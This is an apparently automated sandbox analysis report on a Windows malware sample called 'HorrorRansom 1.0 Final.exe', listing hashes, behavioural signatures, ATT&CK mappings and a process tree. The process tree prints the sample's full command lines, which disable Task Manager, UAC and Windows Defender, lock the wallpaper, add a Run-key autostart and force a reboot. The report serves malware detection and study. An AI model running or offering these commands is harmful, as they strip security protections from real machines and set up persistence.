Analysis
Max time kernel: 4s
Max time network: 7s
Platform: windows11-21h2_x64
Resource: win11-20241007-en
Resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
Submitted: 08-11-2024 14:13
Behavioral tasks (all run on resource win11-20241007-en)
- behavioral1: Dest/HorrorBob2.exe
- behavioral2: Dest/HorrorRansom 1.0 Final.exe
- behavioral3: Dest/HorrorTrojan Ultimate Edition.exe
- behavioral4: Dest/HorrorTrojan123.exe
- behavioral5: Dest/Start.bat
- behavioral6: Dest/covid20.exe
Errors

General
Target: Dest/HorrorRansom 1.0 Final.exe
Size: 1.7MB
MD5: 1a8e74c4bb9a2c5b38b4412a6b484737
SHA1: c01eb730609125dc55641d1aa377d890941b9e83
SHA256: ed73b148716d6015b1466ee92cb331070a90d8a433ee768984cec665970fd327
SHA512: a531fb0fb00dddfd379086d2f0f868447fe7d111d242ecfb27fd468d75dfb6761ee6c13b2fb73a0ec8990b86ce1fb0407a47c2223c712a6752d3ca096c5cd204
SSDEEP: 49152:ot42t5QZkBhBhyKui/2gDSr8XTh3FQ+G7wKC:2QgybsbDBYwK
Malware Config

Signatures

UAC bypass
  Process: reg.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)

Disables Task Manager via registry modification

Adds Run key to start application (2 TTPs, 1 IoC)
  Process: reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" (reg.exe)

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Process: reg.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" (reg.exe)

Yara rule match: upx
  behavioral2/memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp (upx)
  C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe (upx)
  behavioral2/memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp (upx)

System Location Discovery: System Language Discovery (1 TTP, 9 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by each of:
    HorrorRansom 1.0 Final.exe
    reg.exe (4 entries)
    shutdown.exe
    cmd.exe
    reg.exe (2 entries)

Modifies data under HKEY_USERS (15 IoCs)
  Process: LogonUI.exe
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"
  Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209"

Modifies registry key (1 TTP, 3 IoCs)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Process: shutdown.exe (PID 2444)
  Token: SeShutdownPrivilege
  Token: SeRemoteShutdownPrivilege

Suspicious use of SetWindowsHookEx (1 IoC)
  Process: LogonUI.exe (PID 4880)

Suspicious use of WriteProcessMemory (24 IoCs)
  PID 4760 (HorrorRansom 1.0 Final.exe) wrote to memory of PID 2288 (cmd.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 2140 (reg.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 2732 (reg.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 2524 (reg.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 2500 (reg.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 2816 (reg.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 4812 (reg.exe), 3 entries
  PID 2288 (cmd.exe) wrote to memory of PID 2444 (shutdown.exe), 3 entries
Processes (process tree; indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe (PID 4760)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"
  Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 2288)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\reg.exe (PID 2140)
      Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      Signatures: System Location Discovery: System Language Discovery; Modifies registry key

    C:\Windows\SysWOW64\reg.exe (PID 2732)
      Command line: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
      Signatures: Sets desktop wallpaper using registry; System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\reg.exe (PID 2524)
      Command line: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
      Signatures: System Location Discovery: System Language Discovery; Modifies registry key

    C:\Windows\SysWOW64\reg.exe (PID 2500)
      Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      Signatures: UAC bypass; System Location Discovery: System Language Discovery; Modifies registry key

    C:\Windows\SysWOW64\reg.exe (PID 2816)
      Command line: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      Signatures: System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\reg.exe (PID 4812)
      Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
      Signatures: Adds Run key to start application; System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\shutdown.exe (PID 2444)
      Command line: shutdown /r /t 00
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\LogonUI.exe (PID 4880)
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d
  Signatures: Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx
Network

MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Downloads

- Filesize: 1KB
  MD5: 47f426fb3883f2da30e9aa2a7d693fa5
  SHA1: 50d843d68817717f21ba96d26a571ad996a5e35a
  SHA256: b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b
  SHA512: 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

- Filesize: 72KB
  MD5: c875f76e521f520404401122bd82630a
  SHA1: 3b1c78420a55b9a768b28168753c4e22982421ef
  SHA256: a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11
  SHA512: b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

- Filesize: 5.9MB
  MD5: ed30c76a614ec8db5e4ac22e2929f53d
  SHA1: 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4
  SHA256: 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a
  SHA512: ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b